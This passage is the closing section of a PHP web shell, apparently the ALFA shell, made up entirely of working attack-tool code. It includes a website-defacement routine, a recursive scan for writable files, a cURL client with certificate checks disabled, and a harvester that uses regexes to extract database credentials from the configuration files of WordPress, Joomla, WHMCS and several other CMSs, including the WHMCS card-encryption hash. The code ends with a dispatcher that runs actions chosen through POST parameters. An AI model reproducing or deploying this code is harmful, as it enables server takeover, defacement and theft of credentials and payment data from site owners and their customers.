7695. echo @is_file($dir) ? $dir . "<b><font color='red'>DeFaced...</b></font><br>" : '';
7696. }
7697. }
7698. elseif ($m == 'all')
7699. {
7700. @file_put_contents($dir, $defpage);
7701. echo @is_file($dir) ? $dir . " <b><font color='red'>DeFaced...</b></font><br>" : '';
7702. }
7703. }
7704. function alfaGetDisFunc()
7705. {
7706. alfahead();
7707. echo '<div class="header">';
7708. $disfun = @ini_get('disable_functions');
7709. $s = explode(',', $disfun);
7710. $f = array_unique($s);
7711. echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
7712. $i = 1;
7713. foreach ($f as $s)
7714. {
7715. $s = trim($s);
7716. if (function_exists($s) || !is_callable($s)) continue;
7717. echo '<tr><td align="center" style="background-color: black;">' . $i . '</td>';
7718. echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.' . str_replace('_', '-', $s) . '.php"><span class="disable_functions"><b>' . $s . '</b></span></a></td>';
7719. $i++;
7720. }
7721. echo '</table></center>';
7722. echo '</div>';
7723. alfafooter();
7724. }
7725. function Alfa_Create_A_Tag($action, $vals)
7726. {
7727. $nulls = array();
7728. foreach ($vals as $key => $val)
7729. {
7730. echo '<a href=javascript:void(0) onclick="g(\'' . $action . '\',';
7731. for ($i = 1;$i <= $val[1] - 1;$i++) $nulls[] = 'null';
7732. $f = implode(',', $nulls);
7733. echo $f . ',\'' . $val[0] . '\');return false;">| ' . $key . ' | </a>';
7734. unset($nulls);
7735. }
7736. }
7737. function Alfa_Searcher($dir, $ext, $method)
7738. {
7739. if (@is_readable($dir))
7740. {
7741. if ($method == 'all') $ext = '*';
7742. if ($method == 'dirs') $ext = '*';
7743. $globFiles = @glob("$dir/*.$ext");
7744. $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
7745. $blacklist = array();
7746. foreach ($globDirs as $dir)
7747. {
7748. if (!@is_readable($dir)) continue;
7749. @Alfa_Searcher($dir, $ext, $method);
7750. }
7751. switch ($method)
7752. {
7753. case "files":
7754. foreach ($globFiles as $file)
7755. {
7756. if (@is_writable($file))
7757. {
7758. echo "$file<br>";
7759. }
7760. }
7761. break;
7762. case "dirs":
7763. foreach ($globFiles as $file)
7764. {
7765. if (@is_writable(dirname($file)) && !in_array(dirname($file) , $blacklist))
7766. {
7767. echo dirname($file) . '<br>';
7768. $blacklist[] = dirname($file);
7769. }
7770. }
7771. break;
7772. case "all":
7773. foreach ($globFiles as $file)
7774. {
7775. echo $file . '<br>';
7776. }
7777. break;
7778. }
7779. unset($blacklist);
7780. }
7781. }
7782. function AlfaiFrameCreator($f, $width = '100%', $height = '600px')
7783. {
7784. return ('<iframe src="' . $f . '" width="' . $width . '" height="' . $height . '" frameborder="0"></iframe>');
7785. }
7786. class AlfaCURL
7787. {
7788. public $headers;
7789. public $user_agent;
7790. public $compression;
7791. public $cookie_file;
7792. public $proxy;
7793. public $path;
7794. public $ssl = false;
7795. public $curl_status = true;
7796. function __construct($cookies = false, $compression = 'gzip', $proxy = '')
7797. {
7798. if (!extension_loaded('curl'))
7799. {
7800. $curl_status = false;
7801. return false;
7802. }
7803. $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
7804. $this->headers[] = 'Connection: Keep-Alive';
7805. $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
7806. $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
7807. $this->path = ALFA_TEMPDIR . '/Alfa_cookies.txt';
7808. $this->compression = $compression;
7809. $this->proxy = $proxy;
7810. $this->cookies = $cookies;
7811. if ($this->cookies) $this->cookie($this->path);
7812. }
7813. function cookie($cookie_file)
7814. {
7815. if (_alfa_file_exists($cookie_file, false))
7816. {
7817. $this->cookie_file = $cookie_file;
7818. }
7819. else
7820. {
7821. @fopen($cookie_file, 'w') or die($this->error('The cookie file could not be opened.'));
7822. $this->cookie_file = $cookie_file;
7823. @fclose($this->cookie_file);
7824. }
7825. }
7826. function Send($url, $method = "get", $data = "")
7827. {
7828. if (!$this->curl_status)
7829. {
7830. return false;
7831. }
7832. $process = curl_init($url);
7833. curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
7834. curl_setopt($process, CURLOPT_HEADER, 0);
7835. curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
7836. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
7837. curl_setopt($process, CURLOPT_ENCODING, $this->compression);
7838. curl_setopt($process, CURLOPT_TIMEOUT, 30);
7839. if ($this->ssl)
7840. {
7841. curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false);
7842. curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false);
7843. }
7844. if ($this->cookies)
7845. {
7846. curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
7847. curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
7848. }
7849. if ($this->proxy)
7850. {
7851. curl_setopt($process, CURLOPT_PROXY, $this->proxy);
7852. }
7853. if ($method == 'post')
7854. {
7855. curl_setopt($process, CURLOPT_POSTFIELDS, $data);
7856. curl_setopt($process, CURLOPT_POST, 1);
7857. curl_setopt($process, CURLOPT_HTTPHEADER, array(
7858. 'Content-Type: application/x-www-form-urlencoded'
7859. ));
7860. }
7861. $return = curl_exec($process);
7862. curl_close($process);
7863. return $return;
7864. }
7865. function error($error)
7866. {
7867. echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
7868. die;
7869. }
7870. }
7871. function getConfigHtml($cms)
7872. {
7873. $content = '';
7874. $cms_array = array(
7875. "wp" => "WordPress",
7876. "vb" => "vBulletin",
7877. "whmcs" => "Whmcs",
7878. "joomla" => "Joomla",
7879. "phpnuke" => "PHPNuke",
7880. "phpbb" => "PHPBB",
7881. "mybb" => "MyBB",
7882. "drupal" => "Drupal",
7883. "smf" => "SMF"
7884. );
7885. $content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
7886. foreach ($cms_array as $key => $val)
7887. {
7888. $content .= "<option value='{$key}' " . ($key == $cms ? 'selected=selected' : '') . ">{$val}</option>";
7889. }
7890. $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER['DOCUMENT_ROOT'] . "/' size='30' /> <button class='button'>GetConfig</button>";
7891. $content .= "</form>";
7892. return $content;
7893. }
7894. function alfaGetConfig()
7895. {
7896. $cms = $_POST['alfa1'];
7897. $path = trim($_POST['alfa2']);
7898. $config = array(
7899. 'wp' => array(
7900. 'file' => '/wp-config.php',
7901. 'host' => array(
7902. "/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7903. 2
7904. ) ,
7905. 'dbname' => array(
7906. "/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7907. 2
7908. ) ,
7909. 'dbuser' => array(
7910. "/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7911. 2
7912. ) ,
7913. 'dbpw' => array(
7914. "/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7915. 2
7916. ) ,
7917. 'prefix' => array(
7918. "/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7919. 3
7920. )
7921. ) ,
7922. 'drupal' => array(
7923. 'file' => '/config.php',
7924. 'host' => array(
7925. "/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7926. 2
7927. ) ,
7928. 'dbname' => array(
7929. "/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7930. 2
7931. ) ,
7932. 'dbuser' => array(
7933. "/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7934. 2
7935. ) ,
7936. 'dbpw' => array(
7937. "/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7938. 2
7939. ) ,
7940. 'prefix' => array(
7941. "/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",
7942. 2
7943. )
7944. ) ,
7945. 'vb' => array(
7946. 'file' => '/includes/config.php',
7947. 'host' => array(
7948. "/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7949. 3
7950. ) ,
7951. 'dbuser' => array(
7952. "/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7953. 3
7954. ) ,
7955. 'dbname' => array(
7956. "/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7957. 3
7958. ) ,
7959. 'dbpw' => array(
7960. "/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7961. 3
7962. ) ,
7963. 'prefix' => array(
7964. "/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7965. 3
7966. )
7967. ) ,
7968. 'phpnuke' => array(
7969. 'file' => '/config.php',
7970. 'host' => array(
7971. '/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',
7972. 3
7973. ) ,
7974. 'dbname' => array(
7975. '/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',
7976. 3
7977. ) ,
7978. 'dbuser' => array(
7979. '/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',
7980. 3
7981. ) ,
7982. 'dbpw' => array(
7983. '/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',
7984. 3
7985. ) ,
7986. 'prefix' => array(
7987. '/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',
7988. 3
7989. )
7990. ) ,
7991. 'smf' => array(
7992. 'file' => '/Settings.php',
7993. 'host' => array(
7994. "/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7995. 3
7996. ) ,
7997. 'dbname' => array(
7998. "/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
7999. 3
8000. ) ,
8001. 'dbuser' => array(
8002. "/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8003. 3
8004. ) ,
8005. 'dbpw' => array(
8006. "/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8007. 3
8008. ) ,
8009. 'prefix' => array(
8010. "/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8011. 3
8012. )
8013. ) ,
8014. 'whmcs' => array(
8015. 'file' => '/configuration.php',
8016. 'host' => array(
8017. "/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8018. 3
8019. ) ,
8020. 'dbname' => array(
8021. "/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8022. 3
8023. ) ,
8024. 'dbuser' => array(
8025. "/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8026. 3
8027. ) ,
8028. 'dbpw' => array(
8029. "/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8030. 3
8031. ) ,
8032. 'cc_encryption_hash' => array(
8033. "/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8034. 3
8035. )
8036. ) ,
8037. 'joomla' => array(
8038. 'file' => '/configuration.php',
8039. 'host' => array(
8040. "/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8041. 3
8042. ) ,
8043. 'dbname' => array(
8044. "/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8045. 3
8046. ) ,
8047. 'dbuser' => array(
8048. "/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8049. 3
8050. ) ,
8051. 'dbpw' => array(
8052. "/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8053. 3
8054. ) ,
8055. 'prefix' => array(
8056. "/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8057. 3
8058. )
8059. ) ,
8060. 'phpbb' => array(
8061. 'file' => '/config.php',
8062. 'host' => array(
8063. "/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8064. 3
8065. ) ,
8066. 'dbname' => array(
8067. "/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8068. 3
8069. ) ,
8070. 'dbuser' => array(
8071. "/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8072. 3
8073. ) ,
8074. 'dbpw' => array(
8075. "/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8076. 3
8077. ) ,
8078. 'prefix' => array(
8079. "/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8080. 3
8081. )
8082. ) ,
8083. 'mybb' => array(
8084. 'file' => '/inc/config.php',
8085. 'host' => array(
8086. "/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8087. 3
8088. ) ,
8089. 'dbname' => array(
8090. "/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8091. 3
8092. ) ,
8093. 'dbuser' => array(
8094. "/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8095. 3
8096. ) ,
8097. 'dbpw' => array(
8098. "/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8099. 3
8100. ) ,
8101. 'prefix' => array(
8102. "/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",
8103. 3
8104. )
8105. )
8106. );
8107. $data = array();
8108. $srch_host = $config[$cms]['host'][0];
8109. $srch_user = $config[$cms]['dbuser'][0];
8110. $srch_name = $config[$cms]['dbname'][0];
8111. $srch_pw = $config[$cms]['dbpw'][0];
8112. $prefix = $config[$cms]['prefix'][0];
8113. $file = $config[$cms]['file'];
8114. $chost = $config[$cms]['host'][1];
8115. $cuser = $config[$cms]['dbuser'][1];
8116. $cname = $config[$cms]['dbname'][1];
8117. $cpw = $config[$cms]['dbpw'][1];
8118. $cprefix = $config[$cms]['prefix'][1];
8119. if (@is_dir($path) || _alfa_is_dir($path))
8120. {
8121. $file = $path . $file;
8122. }
8123. elseif (@is_file($path) || _alfa_is_dir($path, "-e"))
8124. {
8125. $file = $path;
8126. }
8127. else
8128. {
8129. return false;
8130. }
8131. $file = __read_file($file);
8132. if (preg_match($srch_host, $file, $mach))
8133. {
8134. $data['host'] = $mach[$chost];
8135. }
8136. if (preg_match($srch_user, $file, $mach))
8137. {
8138. $data['user'] = $mach[$cuser];
8139. }
8140. if (preg_match($srch_name, $file, $mach))
8141. {
8142. $data['dbname'] = $mach[$cname];
8143. }
8144. if (preg_match($srch_pw, $file, $mach))
8145. {
8146. $data['password'] = $mach[$cpw];
8147. }
8148. if (isset($prefix))
8149. {
8150. if (preg_match($prefix, $file, $mach))
8151. {
8152. $data['prefix'] = $mach[$cprefix];
8153. }
8154. }
8155. if ($cms == 'whmcs')
8156. {
8157. if (preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach))
8158. {
8159. $data['cc_encryption_hash'] = $mach[3];
8160. }
8161. }
8162. echo json_encode($data);
8163. }
8164. if(empty($_POST['a'])) if(isset($default_action)&&function_exists('alfa'.$default_action)) $_POST['a']=$default_action;
8165. else $_POST['a']='FilesMan';
8166. if (!empty($_POST['a'])&&function_exists('alfa'.$_POST['a'])) call_user_func('alfa'.$_POST['a']);
8167. exit;
8168. ?>